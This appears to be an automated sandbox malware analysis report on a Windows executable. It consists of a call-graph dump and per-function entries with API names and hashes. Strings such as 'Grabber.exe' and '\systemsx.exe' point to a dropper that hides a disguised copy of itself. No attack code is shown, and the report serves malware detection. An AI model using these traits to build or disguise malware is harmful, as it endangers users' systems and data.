4996 7ff79cd64e44 4994->4996 4995->4979 4999 7ff79cd64e84 4995->4999 5002 7ff79cd66dc4 4996->5002 5000 7ff79cd64eb8 4999->5000 5001 7ff79cd64ea0 GetLastError SetLastError 4999->5001 5000->4979 5000->4980 5001->5000 5003 7ff79cd66dfe FlsSetValue 5002->5003 5004 7ff79cd66de3 FlsGetValue 5002->5004 5006 7ff79cd66e0b 5003->5006 5007 7ff79cd64e5f SetLastError 5003->5007 5005 7ff79cd66df8 5004->5005 5004->5007 5005->5003 5008 7ff79cd670f4 _set_fmode 11 API calls 5006->5008 5007->4995 5009 7ff79cd66e1a 5008->5009 5010 7ff79cd66e38 FlsSetValue 5009->5010 5011 7ff79cd66e28 FlsSetValue 5009->5011 5012 7ff79cd66e44 FlsSetValue 5010->5012 5013 7ff79cd66e56 5010->5013 5014 7ff79cd66e31 5011->5014 5012->5014 5015 7ff79cd66934 _set_fmode 11 API calls 5013->5015 5016 7ff79cd6716c __free_lconv_num 11 API calls 5014->5016 5017 7ff79cd66e5e 5015->5017 5016->5007 5018 7ff79cd6716c __free_lconv_num 11 API calls 5017->5018 5018->5007 5035 7ff79cd69b30 5019->5035 5069 7ff79cd69ae8 5035->5069 5074 7ff79cd68588 EnterCriticalSection 5069->5074 5805 7ff79cd619dc 5812 7ff79cd62168 SetUnhandledExceptionFilter 5805->5812 5813 7ff79cd664dc 5814 7ff79cd6650d 5813->5814 5815 7ff79cd664f5 5813->5815 5815->5814 5816 7ff79cd6716c __free_lconv_num 11 API calls 5815->5816 5816->5814 6394 7ff79cd6651c 6395 7ff79cd6716c __free_lconv_num 11 API calls 6394->6395 6396 7ff79cd6652c 6395->6396 6397 7ff79cd6716c __free_lconv_num 11 API calls 6396->6397 6398 7ff79cd66540 6397->6398 6399 7ff79cd6716c __free_lconv_num 11 API calls 6398->6399 6400 7ff79cd66554 6399->6400 6401 7ff79cd6716c __free_lconv_num 11 API calls 6400->6401 6402 7ff79cd66568 6401->6402 6025 7ff79cd6e35e 6027 7ff79cd6e376 6025->6027 6032 7ff79cd6e3e1 6025->6032 6026 7ff79cd63200 _CreateFrameInfo 58 API calls 6028 7ff79cd6e3c3 6026->6028 6027->6026 6027->6032 6029 7ff79cd63200 _CreateFrameInfo 58 API calls 6028->6029 6030 7ff79cd6e3d8 6029->6030 6031 7ff79cd665c4 47 API calls 6030->6031 6031->6032 6406 7ff79cd6e419 6407 7ff79cd62b5c __CxxCallCatchBlock 58 API calls 6406->6407 6411 7ff79cd6e42c 6407->6411 6408 7ff79cd6e46b __CxxCallCatchBlock 6409 7ff79cd63200 _CreateFrameInfo 58 API calls 6408->6409 6410 7ff79cd6e47f 6409->6410 6412 7ff79cd63200 _CreateFrameInfo 58 API calls 6410->6412 6411->6408 6414 7ff79cd62dbc __CxxCallCatchBlock 58 API calls 6411->6414 6413 7ff79cd6e48f 6412->6413 6414->6408 5817 7ff79cd699e4 GetProcessHeap 6033 7ff79cd6a264 6034 7ff79cd6a26f 6033->6034 6042 7ff79cd6bc3c 6034->6042 6055 7ff79cd68588 EnterCriticalSection 6042->6055 5818 7ff79cd631e0 5819 7ff79cd631fa 5818->5819 5820 7ff79cd631e9 5818->5820 5820->5819 5821 7ff79cd665f0 __std_exception_copy 13 API calls 5820->5821 5821->5819 5822 7ff79cd65ee0 5825 7ff79cd65e64 5822->5825 5832 7ff79cd68588 EnterCriticalSection 5825->5832 5906 7ff79cd62ea0 5907 7ff79cd665c4 47 API calls 5906->5907 5908 7ff79cd62ea9 5907->5908 6415 7ff79cd61b20 6416 7ff79cd62114 GetModuleHandleW 6415->6416 6417 7ff79cd61b27 __GetCurrentState 6416->6417 5909 7ff79cd6e49f 5912 7ff79cd62e10 5909->5912 5913 7ff79cd62e28 5912->5913 5914 7ff79cd62e3a 5912->5914 5913->5914 5916 7ff79cd62e30 5913->5916 5915 7ff79cd63200 _CreateFrameInfo 58 API calls 5914->5915 5918 7ff79cd62e3f 5915->5918 5917 7ff79cd62e38 5916->5917 5919 7ff79cd63200 _CreateFrameInfo 58 API calls 5916->5919 5918->5917 5920 7ff79cd63200 _CreateFrameInfo 58 API calls 5918->5920 5921 7ff79cd62e5f 5919->5921 5920->5917 5922 7ff79cd63200 _CreateFrameInfo 58 API calls 5921->5922 5923 7ff79cd62e6c 5922->5923 5924 7ff79cd665c4 47 API calls 5923->5924 5925 7ff79cd62e75 5924->5925 6056 7ff79cd6316c 6063 7ff79cd649cc 6056->6063 6061 7ff79cd63179 6064 7ff79cd649d4 6063->6064 6066 7ff79cd64a05 6064->6066 6068 7ff79cd63175 6064->6068 6076 7ff79cd64cc8 6064->6076 6067 7ff79cd64a14 __vcrt_uninitialize_locks DeleteCriticalSection 6066->6067 6067->6068 6068->6061 6069 7ff79cd632dc 6068->6069 6081 7ff79cd64b9c 6069->6081 6077 7ff79cd64a4c __vcrt_FlsAlloc 5 API calls 6076->6077 6078 7ff79cd64cfe 6077->6078 6079 7ff79cd64d08 6078->6079 6080 7ff79cd64d13 InitializeCriticalSectionAndSpinCount 6078->6080 6079->6064 6080->6079 6082 7ff79cd64a4c __vcrt_FlsAlloc 5 API calls 6081->6082 6083 7ff79cd64bc1 TlsAlloc 6082->6083 6085 7ff79cd61b6c 6088 7ff79cd61e60 6085->6088 6089 7ff79cd61b75 6088->6089 6090 7ff79cd61e83 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6088->6090 6090->6089 6418 7ff79cd6ad2c 6419 7ff79cd67fd0 68 API calls 6418->6419 6420 7ff79cd6ad35 6419->6420 6091 7ff79cd64068 6092 7ff79cd64095 __except_validate_context_record 6091->6092 6093 7ff79cd63200 _CreateFrameInfo 58 API calls 6092->6093 6094 7ff79cd6409a 6093->6094 6096 7ff79cd64182 6094->6096 6099 7ff79cd640f4 6094->6099 6112 7ff79cd64148 6094->6112 6095 7ff79cd641f0 6095->6112 6153 7ff79cd637e8 6095->6153 6106 7ff79cd641a1 6096->6106 6147 7ff79cd62bb0 6096->6147 6098 7ff79cd6416f 6138 7ff79cd627b4 6098->6138 6099->6098 6100 7ff79cd6414d 6099->6100 6101 7ff79cd64116 6099->6101 6099->6112 6100->6098 6105 7ff79cd64125 6100->6105 6114 7ff79cd633ec 6101->6114 6107 7ff79cd64299 6105->6107 6110 7ff79cd64137 6105->6110 6106->6095 6106->6112 6150 7ff79cd62bc4 6106->6150 6109 7ff79cd66604 __GetCurrentState 47 API calls 6107->6109 6111 7ff79cd6429e 6109->6111 6119 7ff79cd64574 6110->6119 6115 7ff79cd633fa 6114->6115 6116 7ff79cd66604 __GetCurrentState 47 API calls 6115->6116 6118 7ff79cd6340b 6115->6118 6117 7ff79cd63451 6116->6117 6118->6105 6120 7ff79cd62bb0 Is_bad_exception_allowed 58 API calls 6119->6120 6121 7ff79cd645a3 6120->6121 6215 7ff79cd63348 6121->6215 6124 7ff79cd63200 _CreateFrameInfo 58 API calls 6136 7ff79cd645c0 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 6124->6136 6125 7ff79cd646b7 6126 7ff79cd63200 _CreateFrameInfo 58 API calls 6125->6126 6128 7ff79cd646bc 6126->6128 6127 7ff79cd646f2 6129 7ff79cd66604 __GetCurrentState 47 API calls 6127->6129 6130 7ff79cd63200 _CreateFrameInfo 58 API calls 6128->6130 6132 7ff79cd646c7 6128->6132 6129->6132 6130->6132 6131 7ff79cd646d4 __FrameHandler3::GetHandlerSearchState 6131->6112 6132->6131 6133 7ff79cd66604 __GetCurrentState 47 API calls 6132->6133 6134 7ff79cd646fd 6133->6134 6135 7ff79cd62bb0 58 API calls Is_bad_exception_allowed 6135->6136 6136->6125 6136->6127 6136->6135 6137 7ff79cd62bd8 __FrameHandler3::FrameUnwindToEmptyState 58 API calls 6136->6137 6137->6136 6219 7ff79cd62818 6138->6219 6145 7ff79cd64574 __FrameHandler3::FrameUnwindToEmptyState 58 API calls 6146 7ff79cd62808 6145->6146 6146->6112 6148 7ff79cd63200 _CreateFrameInfo 58 API calls 6147->6148 6149 7ff79cd62bb9 6148->6149 6149->6106 6151 7ff79cd63200 _CreateFrameInfo 58 API calls 6150->6151 6152 7ff79cd62bcd 6151->6152 6152->6095 6233 7ff79cd64700 6153->6233 6155 7ff79cd66604 __GetCurrentState 47 API calls 6156 7ff79cd63cb6 6155->6156 6157 7ff79cd63c01 6196 7ff79cd63cb0 6157->6196 6201 7ff79cd63bff 6157->6201 6296 7ff79cd63cb8 6157->6296 6158 7ff79cd6392f 6158->6157 6159 7ff79cd63967 6158->6159 6170 7ff79cd63b31 6159->6170 6261 7ff79cd628e8 6159->6261 6161 7ff79cd63200 _CreateFrameInfo 58 API calls 6164 7ff79cd63c43 6161->6164 6162 7ff79cd63200 _CreateFrameInfo 58 API calls 6166 7ff79cd63896 6162->6166 6167 7ff79cd63c4a 6164->6167 6164->6196 6166->6167 6172 7ff79cd63200 _CreateFrameInfo 58 API calls 6166->6172 6168 7ff79cd61b90 _log10_special 8 API calls 6167->6168 6173 7ff79cd63c56 6168->6173 6169 7ff79cd63b4e 6176 7ff79cd63b70 6169->6176 6169->6201 6288 7ff79cd62788 6169->6288 6170->6169 6171 7ff79cd62bb0 Is_bad_exception_allowed 58 API calls 6170->6171 6170->6201 6171->6169 6175 7ff79cd638a6 6172->6175 6173->6112 6177 7ff79cd63200 _CreateFrameInfo 58 API calls 6175->6177 6178 7ff79cd63c93 6176->6178 6179 7ff79cd63b86 6176->6179 6176->6201 6180 7ff79cd638af 6177->6180 6182 7ff79cd63200 _CreateFrameInfo 58 API calls 6178->6182 6181 7ff79cd63b91 6179->6181 6184 7ff79cd62bb0 Is_bad_exception_allowed 58 API calls 6179->6184 6245 7ff79cd62bf0 6180->6245 6188 7ff79cd64798 58 API calls 6181->6188 6185 7ff79cd63c99 6182->6185 6184->6181 6187 7ff79cd63200 _CreateFrameInfo 58 API calls 6185->6187 6190 7ff79cd63ca2 6187->6190 6191 7ff79cd63ba7 6188->6191 6189 7ff79cd62bc4 58 API calls 6206 7ff79cd63993 6189->6206 6194 7ff79cd665c4 47 API calls 6190->6194 6195 7ff79cd62818 __SetUnwindTryBlock 48 API calls 6191->6195 6191->6201 6192 7ff79cd63200 _CreateFrameInfo 58 API calls 6193 7ff79cd638f1 6192->6193 6193->6158 6198 7ff79cd63200 _CreateFrameInfo 58 API calls 6193->6198 6194->6196 6197 7ff79cd63bc1 6195->6197 6196->6155 6293 7ff79cd62a1c RtlUnwindEx 6197->6293 6200 7ff79cd638fd 6198->6200 6202 7ff79cd63200 _CreateFrameInfo 58 API calls 6200->6202 6201->6161 6204 7ff79cd63906 6202->6204 6248 7ff79cd64798 6204->6248 6206->6170 6206->6189 6267 7ff79cd63f28 6206->6267 6281 7ff79cd63714 6206->6281 6209 7ff79cd6391a 6257 7ff79cd64888 6209->6257 6211 7ff79cd63c8d 6212 7ff79cd665c4 47 API calls 6211->6212 6212->6178 6213 7ff79cd63922 __CxxCallCatchBlock std::bad_alloc::bad_alloc 6213->6211 6214 7ff79cd62eac std::_Xinvalid_argument 2 API calls 6213->6214 6214->6211 6216 7ff79cd6336a 6215->6216 6217 7ff79cd6335f 6215->6217 6216->6124 6218 7ff79cd633ec __GetCurrentState 47 API calls 6217->6218 6218->6216 6220 7ff79cd633e4 __FrameHandler3::ExecutionInCatch 47 API calls 6219->6220 6223 7ff79cd62846 6220->6223 6221 7ff79cd627d3 6224 7ff79cd633e4 6221->6224 6222 7ff79cd62870 RtlLookupFunctionEntry 6222->6223 6223->6221 6223->6222 6225 7ff79cd633ec 6224->6225 6226 7ff79cd66604 __GetCurrentState 47 API calls 6225->6226 6228 7ff79cd627e1 6225->6228 6227 7ff79cd63451 6226->6227 6229 7ff79cd62724 6228->6229 6231 7ff79cd6276f 6229->6231 6232 7ff79cd62744 6229->6232 6230 7ff79cd63200 _CreateFrameInfo 58 API calls 6230->6232 6231->6145 6232->6230 6232->6231 6234 7ff79cd633e4 __FrameHandler3::ExecutionInCatch 47 API calls 6233->6234 6235 7ff79cd64725 6234->6235 6236 7ff79cd62818 __SetUnwindTryBlock 48 API calls 6235->6236 6237 7ff79cd6473a 6236->6237 6314 7ff79cd63370 6237->6314 6240 7ff79cd6476f 6241 7ff79cd63370 __GetUnwindTryBlock 48 API calls 6240->6241 6242 7ff79cd6384a 6241->6242 6242->6158 6242->6162 6242->6196 6243 7ff79cd6474c __FrameHandler3::GetHandlerSearchState 6317 7ff79cd633a8 6243->6317 6246 7ff79cd63200 _CreateFrameInfo 58 API calls 6245->6246 6247 7ff79cd62bfe 6246->6247 6247->6192 6247->6196 6249 7ff79cd6487f 6248->6249 6254 7ff79cd647c3 6248->6254 6251 7ff79cd66604 __GetCurrentState 47 API calls 6249->6251 6250 7ff79cd63916 6250->6158 6250->6209 6253 7ff79cd64884 6251->6253 6252 7ff79cd62bc4 58 API calls 6252->6254 6254->6250 6254->6252 6255 7ff79cd62bb0 Is_bad_exception_allowed 58 API calls 6254->6255 6256 7ff79cd63f28 58 API calls 6254->6256 6255->6254 6256->6254 6258 7ff79cd648a5 Is_bad_exception_allowed 6257->6258 6260 7ff79cd648f5 6257->6260 6259 7ff79cd62bb0 58 API calls Is_bad_exception_allowed 6258->6259 6258->6260 6259->6258 6260->6213 6262 7ff79cd633e4 __FrameHandler3::ExecutionInCatch 47 API calls 6261->6262 6263 7ff79cd62926 6262->6263 6264 7ff79cd66604 __GetCurrentState 47 API calls 6263->6264 6266 7ff79cd62934 6263->6266 6265 7ff79cd62a18 6264->6265 6266->6206 6268 7ff79cd63f55 6267->6268 6279 7ff79cd63fe4 6267->6279 6269 7ff79cd62bb0 Is_bad_exception_allowed 58 API calls 6268->6269 6270 7ff79cd63f5e 6269->6270 6271 7ff79cd62bb0 Is_bad_exception_allowed 58 API calls 6270->6271 6272 7ff79cd63f77 6270->6272 6270->6279 6271->6272 6273 7ff79cd63fa3 6272->6273 6274 7ff79cd62bb0 Is_bad_exception_allowed 58 API calls 6272->6274 6272->6279 6275 7ff79cd62bc4 58 API calls 6273->6275 6274->6273 6276 7ff79cd63fb7 6275->6276 6277 7ff79cd63fd0 6276->6277 6278 7ff79cd62bb0 Is_bad_exception_allowed 58 API calls 6276->6278 6276->6279 6280 7ff79cd62bc4 58 API calls 6277->6280 6278->6277 6279->6206 6280->6279 6282 7ff79cd62818 __SetUnwindTryBlock 48 API calls 6281->6282 6283 7ff79cd63751 6282->6283 6284 7ff79cd62bb0 Is_bad_exception_allowed 58 API calls 6283->6284 6285 7ff79cd63789 6284->6285 6286 7ff79cd62a1c 9 API calls 6285->6286 6287 7ff79cd637cd 6286->6287 6287->6206 6289 7ff79cd633e4 __FrameHandler3::ExecutionInCatch 47 API calls 6288->6289 6290 7ff79cd6279c 6289->6290 6291 7ff79cd62724 __FrameHandler3::ExecutionInCatch 58 API calls 6290->6291 6292 7ff79cd627a6 6291->6292 6292->6176 6294 7ff79cd61b90 _log10_special 8 API calls 6293->6294 6295 7ff79cd62b16 6294->6295 6295->6201 6297 7ff79cd63f04 6296->6297 6298 7ff79cd63cf1 6296->6298 6297->6201 6299 7ff79cd63200 _CreateFrameInfo 58 API calls 6298->6299 6300 7ff79cd63cf6 6299->6300 6301 7ff79cd63d15 EncodePointer 6300->6301 6302 7ff79cd63d68 6300->6302 6305 7ff79cd63200 _CreateFrameInfo 58 API calls 6301->6305 6302->6297 6303 7ff79cd63d88 6302->6303 6304 7ff79cd63f1f 6302->6304 6306 7ff79cd628e8 47 API calls 6303->6306 6307 7ff79cd66604 __GetCurrentState 47 API calls 6304->6307 6310 7ff79cd63d25 6305->6310 6308 7ff79cd63daa 6306->6308 6309 7ff79cd63f24 6307->6309 6308->6297 6312 7ff79cd63714 60 API calls 6308->6312 6313 7ff79cd62bb0 58 API calls Is_bad_exception_allowed 6308->6313 6310->6302 6320 7ff79cd626d0 6310->6320 6312->6308 6313->6308 6315 7ff79cd62818 __SetUnwindTryBlock 48 API calls 6314->6315 6316 7ff79cd63383 6315->6316 6316->6240 6316->6243 6318 7ff79cd62818 __SetUnwindTryBlock 48 API calls 6317->6318 6319 7ff79cd633c2 6318->6319 6319->6242 6321 7ff79cd63200 _CreateFrameInfo 58 API calls 6320->6321 6322 7ff79cd626fc 6321->6322 6322->6302 5932 7ff79cd6e4b5 5933 7ff79cd63200 _CreateFrameInfo 58 API calls 5932->5933 5934 7ff79cd6e4c3 5933->5934 5935 7ff79cd6e4ce 5934->5935 5936 7ff79cd63200 _CreateFrameInfo 58 API calls 5934->5936 5936->5935 5937 7ff79cd6e2b6 5938 7ff79cd63200 _CreateFrameInfo 58 API calls 5937->5938 5939 7ff79cd6e2ce 5938->5939 5940 7ff79cd63200 _CreateFrameInfo 58 API calls 5939->5940 5941 7ff79cd6e2e9 5940->5941 5942 7ff79cd63200 _CreateFrameInfo 58 API calls 5941->5942 5943 7ff79cd6e2fd 5942->5943 5944 7ff79cd63200 _CreateFrameInfo 58 API calls 5943->5944 5945 7ff79cd6e33f 5944->5945 5833 7ff79cd6e3f4 5836 7ff79cd644f0 5833->5836 5837 7ff79cd6450a 5836->5837 5839 7ff79cd64557 5836->5839 5838 7ff79cd63200 _CreateFrameInfo 58 API calls 5837->5838 5837->5839 5838->5839 5946 7ff79cd6e5b4 5947 7ff79cd6e5cd 5946->5947 5948 7ff79cd6e5c3 5946->5948 5950 7ff79cd685dc LeaveCriticalSection 5948->5950

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 00007FF79CD61220 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 161libraryprocessloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle$AddressAttributesCreateFileLibraryLoadProcProcess
                                                                                                                                                                                                                          • String ID: Grabber.exe$SHGetFolderPathW$SetFileAttributesW$\systemsx.exe$kernel32.dll$shell32.dll
                                                                                                                                                                                                                          • API String ID: 2924118934-2460580913
                                                                                                                                                                                                                          • Opcode ID: a283b7996dd8ea90ec63bd22a772aeb0ca61ea029a5e455ac22c6a10f6b8e0ba
                                                                                                                                                                                                                          • Instruction ID: f3578a81cbc4e73ab33b6e20a2438a8ec0c06752d3b3b6ed20d12451726e8c38
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a283b7996dd8ea90ec63bd22a772aeb0ca61ea029a5e455ac22c6a10f6b8e0ba
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED816E32B18F4296EB20EF71E9506ADB3B4FB84788F906136DA4D43A69DF38D149C750
                                                                                                                                                                                                                          Function 00007FF79CD694F4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF79CD696D8,?,?,00000000,00007FF79CD6864B,?,?,?,00007FF79CD65D19), ref: 00007FF79CD69670
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF79CD696D8,?,?,00000000,00007FF79CD6864B,?,?,?,00007FF79CD65D19), ref: 00007FF79CD6967C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                          • API String ID: 3013587201-537541572
                                                                                                                                                                                                                          • Opcode ID: 1a36ae75ebb48bdc0dc40d534f0c19d784095a1ef365b1df4ea58e2a01dd3282
                                                                                                                                                                                                                          • Instruction ID: 9848630497ba22b0ead442d4352a9860d09014bf239f876adcc016570b5876a9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a36ae75ebb48bdc0dc40d534f0c19d784095a1ef365b1df4ea58e2a01dd3282
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD41C022B19F0381FF26EB66AA00675B2B5BF45BA0F896535DD0D87794EE3CE405C320
                                                                                                                                                                                                                          Function 00007FF79CD69798 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: String
                                                                                                                                                                                                                          • String ID: LCMapStringEx
                                                                                                                                                                                                                          • API String ID: 2568140703-3893581201
                                                                                                                                                                                                                          • Opcode ID: f3eae0ff27bc5f31cdd34cc0bf7798a4e11c8bf465d46c1a8007fb9d0b5c3cc8
                                                                                                                                                                                                                          • Instruction ID: f1f217076c9c35a5fcaa4b75b113b165fadf4a67d737ae91673f7be3e4b762c2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3eae0ff27bc5f31cdd34cc0bf7798a4e11c8bf465d46c1a8007fb9d0b5c3cc8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC213D36708F8186DB70DB16B44029AB3A4FB88BC0F845136EA8D83B19DE3CD441CB00
                                                                                                                                                                                                                          Function 00007FF79CD619F8 Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3251591375-0
                                                                                                                                                                                                                          • Opcode ID: 39686c0a065c59aa3fbab3e5ed5a82e5f71a87c27abb532d05479a8a28dbb884
                                                                                                                                                                                                                          • Instruction ID: 83c46a3d6ab8e546016fdf7463ac9dfc85adccbb9951b6214c016aed3aac00fb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39686c0a065c59aa3fbab3e5ed5a82e5f71a87c27abb532d05479a8a28dbb884
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F31E512B0DD0345EE74BB7596553BDB2B1AF45384FC46134E54E472E3EE2CA845C660
                                                                                                                                                                                                                          Function 00007FF79CD6116C Relevance: 4.6, APIs: 3, Instructions: 51fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 128 7ff79cd6116c-7ff79cd61192 129 7ff79cd61197-7ff79cd611c6 CreateFileW 128->129 130 7ff79cd61194 128->130 131 7ff79cd611cc-7ff79cd611f2 WriteFile CloseHandle 129->131 132 7ff79cd611c8-7ff79cd611ca 129->132 130->129 134 7ff79cd611f4-7ff79cd611fb 131->134 135 7ff79cd61200 131->135 133 7ff79cd61203-7ff79cd6121f call 7ff79cd61b90 132->133 134->135 136 7ff79cd611fd 134->136 135->133 136->135
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1065093856-0
                                                                                                                                                                                                                          • Opcode ID: 1de5265e70b36155833214aa989500a80106cc326832a612e1592c9f84b4bff4
                                                                                                                                                                                                                          • Instruction ID: a951b40582eca9a74ae7a9c6c80f5df0ea24cdcc0bbc9a4894b71e1c3c2eb7ca
